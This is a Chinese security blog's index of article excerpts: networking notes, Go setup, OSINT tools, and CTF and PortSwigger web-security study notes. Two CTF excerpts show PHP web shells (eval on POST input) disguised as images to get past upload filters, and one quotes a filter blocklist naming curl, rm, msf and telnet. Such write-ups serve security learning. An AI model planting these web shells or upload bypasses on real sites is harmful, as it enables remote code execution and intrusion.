汗的博客

原创 GCHQ开源数据分析工具CyberChef的使用

文章目录简介工具在线使用地址使用实例简介工具在线使用地址https://gchq.github.io/CyberChef/使用实例

原创 计算机网络:应用层 思维导图

思维导图

原创 Windows 7和Windows Server 2008 R2 安全事件id的说明

简介本文介绍了在 Windows 7 和 Windows Server 2008 R2 中的各种与安全和审核有关事件。本文还提供了有关如何解释这些事件的信息。所有这些事件出现在安全日志中，并与源的安全审核记录。本文还介绍如何检索有关个别事件的更具说明性数据。适用于：Windows Server 2008 R2 DatacenterWindows Server 2008 R2 EnterpriseWindows Server 2008 R2 StandardWindows 7 EnterpriseW.

原创 windows系统启动文件夹%SystemRoot%

有时候在Windows下会看到 %SystemRoot%这个路径，实际上这是Windows的环境变量，windows系统启动文件夹，具体要视计算机情况而定查看具体文件夹 win+r -> cmd -> echo %SystemRoot%

原创 计算机网络 谢希仁 学习笔记（五）传输层（传输层）-思维导图 重要概念

文章目录思维导图重要概念简述传输层提供的服务运输层和网络层提供的服务有什么区别传输层有什么主要协议；简要描述两种协议特点运输层用什么标志端口；在哪里适用；有什么意义两台计算机的进程相互通信只需要知道对方IP地址就够了吗运输层的端口号有什么分类；分别有什么含义简要说说UDP的主要特点简要说说TCP的主要特点什么是套接字（socket）；怎么表示简述停止等待协议简述超时重传在停止等待协议中，若接收方收到重复分组，接收方怎么处理简述连续ARQ协议的特点以及工作方式简述TCP报文段首部简述TCP首部中的确认号简述T

原创 kali Linux卡死排查笔记

kali在运行某程序后卡死了，在这里做个排查笔记，确定哪个进程造成的，其他Linux应该也通用。文章目录查看内存占用获取占用内存资源最多的10个进程查看CPU占用获取占用CPU资源最多的10个进程：查看内存占用free -m当物理内存快被耗尽时，系统并没有崩溃，而是拿swap做临时内存，当两者都耗尽，系统就挂了物理内存到达峰值，系统中可能一些不常用的进程内存占用被挪用到swap区当Mem区的资源进行释放时，被挪到swap的内存并不会立即恢复Swap是内存不够时虚拟出来的内存，处理速度不高

原创 计算机网络 谢希仁 学习笔记（四）网络层-重要概念

可以只看目录，自查文章目录简单描述网络层的服务以及特点IP网是什么；有什么优点互联网上的交付有哪两种IP地址在因特网范围是唯一的吗；有哪些分类IP地址由什么字段组成；第一个字段有什么含义IP地址的网络号和主机号分别由水管理；路由器根据什么转发分组一台主机是否可以有多个ip；路由器至少需要几个ip相同的网络号用转发器或者网桥连接的若干个局域网是否是同一个网络物理地址和IP地址有什么区别，分别在什么层使用IP数据报分为几个部分；各部分分别又由哪些组成如何防止IP数据宝在互联网中无限制的兜圈子什么是ARP协议；

原创 计算机网络:网络层 思维导图

原创 Fofa的简单使用

因为没氪金，没法深入研究，，，文章目录地址简介查询语法参考基本语法逻辑运算符其他地址https://www.fofa.so/简介官网这样描述：FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。简单理解就是，一个本土加强版shodan，知道某产品在互联网的部署情况、获取一个根域名所有子域名网站、根据IP确认企业、根据一个子域名网站找到跟他在一个IP的其他网站、全网漏洞扫描、一个新的漏洞

原创 私有ip地址的网段

1. 公网IP地址是不可能重复的（全球唯一的IP地址）2. 私有IP地址可以重复（不过是在不同的局域网中）3. 路由器有两个口：一个是WAN口，一个是LAN口；另外LAN口中所分配的IP地址一定是私有地址；而WAN口的地址不一定是公网地址，因为有可能这个路由器是公网中的一个局域网(下面会用图来介绍)地址类别 网段范围 网段个数 A 10.0.0.0~10.255.255.255 1 B 172.16.0.0~172.31.255.255 16 C

原创 一张表格搞懂那些特殊的IP地址

一些特殊的ip地址，比如127.*.*.*、0.0.0.0以及他们的用途网络号 主机号 作为ip分组的源地址 作为ip分组的目的地址 用途 全0 全0 可以 不可以 本网范围内表示主机，路由表中用于表示默认路由 全0 特定值 不可以 可以 表示本网内某个特定主机 全1 全1 不可以 可以 网络地址，表示一个网络 特定值 全0 不可以 不可以 网络地址，表示一个网络.

原创 一张表格看懂设备是否能分离广播域或冲突域的问题

解决计算机网络中的一个常见问题：XXX 设备能否分离一个广播域/冲突域？ 冲突域 广播域 物理层设备 ❌ ❌ 链路层设备 ✔ ❌ 网络层设备 ✔ ✔

转载 一张图解决选择开源许可证问题

经常接触GitHub就会发现，很多项目采用不同的许可证，许可证内容也很麻烦，使用不恰当也会造成很多的麻烦。我们该怎样选择合适的许可证？或者修改开源项目时该怎样避免侵犯原项目的权利问题呢？我们不可能将心思都放在解决这种问题上。本文主要解决如何为项目选择开源许可证这张图大致是关于GPL、BSD、MIT、Mozilla、Apache和LGPL这几种许可证转载自：http://www.ruanyifeng.com/blog/2011/05/how_to_choose_free_software_licenses

原创 计算机网络 谢希仁 学习笔记（六）应用层-重要概念

问答形式，方便自查文章目录应用层协议的作用因特网的命名系统是什么；是个怎样的系统，采用的什么方式如何完成域名到IP地址的解析因特网的命名方法采用了什么结构；域名中的点和点分十进制IP地址中的点是否有关系域名服务器的分类FTP使用什么协议实现可靠的运输服务；FTP使用的是什么工作方式；FTP进程可为一个还是多个客户进程提供服务；FTP怎样实现的；建立的连接分别有什么作用；实际传输文件的是什么连接万维网WWW是什么简要描述万维网的工作方式；在客户程序主窗口上显示出的万维网文档通常称为什么万维网通过什么来标志万

原创 分享一些对Google hack有帮助的网站

看到网上很多关于Google hack只是列了些基本的语法，感觉不是很好，就好比编程只会一些基本的语法，但是却不读文档，这样也只能固步自封，所以分享一些Google hack有帮助的网站和资料第一个是GHDB（Google Hacking Database）https://www.exploit-db.com/google-hacking-databasesearchsploit的衍生产品了...

原创 Web-[极客大挑战 2019] Upload1

文章目录[极客大挑战 2019]Upload1[极客大挑战 2019]Upload1shell名she.phtml内容GIF98a<script language="php">eval($_POST['cmd']);</script>burp抓包Content-Type: image/jpeg在upload/目录下，访问页面，蚁剑连接，cat /flag...

原创 计算机网络:数据链路层 思维导图

文章目录自查版自查版

原创 Recon-ng的简单使用（recon-ng v5.1.1）

正如其作者所描述的，“是一个用Python编写的功能齐全的网络侦察框架。配有独立模块、数据库交互、内置的便利功能、交互帮助和命令完成，侦察提供了一个强大的环境，在这个环境中，基于web的开放源代码侦察可以迅速而彻底地进行。侦察兵有一种感觉类似于Metasploit框架，减少了利用框架”。让我们使用recon-ng快速编译一个有趣的数据列表。我们将从使用whois_poc模块提供思科的员工姓名...

原创 CLI和GUI的区别

CLICommand-Line Interface的缩写GUIGraphical User Interface的缩写简单说，二者在写代码时候的区别CLI = 功能逻辑GUI = 功能逻辑+用户交互逻辑明显GUI比CLI更加复杂，不但要考虑UI的美观等，还要考虑用户的交互性等。...

原创 Go在线学习资料

整理一些go学习的资料，持续更新ing在线部分go的wiki最全的资料，包括了学习的全流程，不过很多链接需要特殊方式上网https://github.com/golang/go/wikigo指南一个在线的交互式指南https://tour.go-zh.org/welcome/1菜鸟教程偏在线文档性质https://www.runoob.com/go/go-tutorial.html实验楼《Go 语言简明教程》https://www.shiyanlou.com/courses/1

原创 配置Go开发环境和hello world

文章目录配置vim安装 Pathogen前往http://www.vim.org/scripts/script.php?script_id=2332，找到下方的最新版 Package ZIP 包下载链接；下载解压后你会得到一个名称为 autoload 的目录，将目录下的文件 pathogen.vim 拷贝至~/.vim/autoload/pathogen.vim；编辑 ~/.vimrc 文件，在顶部加入行 call pathogen#infect()。安装 VIM-GO 插件装好了插件管理器，

原创 访问控制漏洞和特权升级（Access control vulnerabilities and privilege escalation）学习笔记

笔者burpsuite的在线安全学院的Access control vulnerabilities and privilege escalation学习笔记。笔者认为这这个的覆盖面比国内俗称的越权要广，所以就直译了。限于本人水平，笔记质量不是很高，假如有看到的大佬轻喷，很多地方是Google翻译的。文章目录访问控制漏洞和特权升级什么是访问控制？访问控制安全模型什么是访问控制安全模型？程序访问控制...

原创 目录遍历（Directory traversal）

笔者burpsuite的在线安全学院的目录遍历学习笔记。限于本人水平，笔记质量不是很高，假如有看到的大佬轻喷，很多地方是Google翻译的。文章目录什么是目录遍历？通过目录遍历读取任意文件Lab: File path traversal, simple case利用文件路径遍历漏洞的常见障碍Lab: File path traversal, traversal sequences blocked...

原创 De1ctf 2020 -'Misc杂烩' writeup

一道很有意思的流量分析+NTFS隐写文章目录描述文件地址hintwriteup描述文件地址https://drive.google.com/file/d/1-SrQ8JbD8zAQNVlvuwu3T2Lbu_o1knRQ/view?usp=sharinghintwriteup下载文件，wireshark打开，看了下有很多post请求，文件-导出对象-http然后会导出一堆文件，...

原创 De1ctf 2020 -'check in' writeup

这道题很有意思，考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过文件内容过滤了很多字符perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!传jpg格式的shell<?=eval($_POST[123]);传.htaccess文件，burp...

原创 操作系统命令注入（OS command injection）学习笔记

笔者burpsuite在线安全学院的OS command injection学习笔记。限于本人水平，笔记质量不是很高，假如有看到的大佬轻喷，很多地方是Google翻译的，还请多多包涵。文章目录什么是OS命令注入？执行任意命令Lab: OS command injection, simple case有用的命令OS盲注使用时间延迟检测OS盲注Lab: Blind OS command inject...

原创 Web缓存中毒（web cache poisoning）学习笔记

笔者burpsuite的在线安全学院的ssti学习笔记。限于本人水平，笔记质量不是很高，假如有看到的大佬轻喷，很多地方是Google翻译的。首先推荐篇翻译的文章，方便理解#先知社区上师傅翻译的：实战Web缓存中毒https://xz.aliyun.com/t/2585#toc-21#原文https://portswigger.net/blog/practical-web-cache-po...

原创 Server-side template injection (SSTI)学习笔记

文章目录阅读文档了解基本模板语法Lab: Basic server-side template injectionLab: Basic server-side template injection (code context)了解安全隐患寻找已知漏洞探索开发人员提供的对象创建自定义攻击阅读文档文档是最有用的信息来源，例如，一旦您知道正在使用基于Python的Mako模板引擎，实现远程代码执行就...